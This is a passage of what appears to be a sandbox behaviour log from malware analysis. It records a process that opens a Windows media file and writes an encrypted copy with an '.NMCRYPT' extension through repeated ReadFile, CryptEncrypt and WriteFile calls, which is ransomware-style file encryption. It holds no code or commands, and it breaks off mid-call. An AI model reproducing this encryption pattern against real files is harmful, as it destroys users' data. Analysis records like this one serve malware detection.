[0144.057] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0144.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0144.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0144.217] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=1600388) returned 1 [0144.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0144.218] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.380] GetLastError () returned 0x0 [0144.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.382] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.383] GetLastError () returned 0x0 [0144.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.383] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.383] GetLastError () returned 0x0 [0144.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.383] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.383] GetLastError () returned 0x0 [0144.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.383] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.383] GetLastError () returned 0x0 [0144.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.383] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.383] GetLastError () returned 0x0 [0144.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.383] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.383] GetLastError () returned 0x0 [0144.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.383] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.384] GetLastError () returned 0x0 [0144.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.384] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.385] GetLastError () returned 0x0 [0144.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.385] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.385] GetLastError () returned 0x0 [0144.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.385] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.400] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.400] GetLastError () returned 0x0 [0144.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.400] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.400] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.400] GetLastError () returned 0x0 [0144.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.400] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.400] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.400] GetLastError () returned 0x0 [0144.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.400] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.401] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.401] GetLastError () returned 0x0 [0144.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.401] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.401] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.401] GetLastError () returned 0x0 [0144.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.401] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.401] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.401] GetLastError () returned 0x0 [0144.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.401] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.401] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.401] GetLastError () returned 0x0 [0144.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.401] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.401] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.401] GetLastError () returned 0x0 [0144.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.401] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.401] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.401] GetLastError () returned 0x0 [0144.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.401] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.402] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.402] GetLastError () returned 0x0 [0144.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.402] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.402] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.402] GetLastError () returned 0x0 [0144.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.402] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.402] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.402] GetLastError () returned 0x0 [0144.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.402] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.402] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.402] GetLastError () returned 0x0 [0144.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.402] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.402] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.402] GetLastError () returned 0x0 [0144.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.402] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.402] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.402] GetLastError () returned 0x0 [0144.402] WriteFile (in: 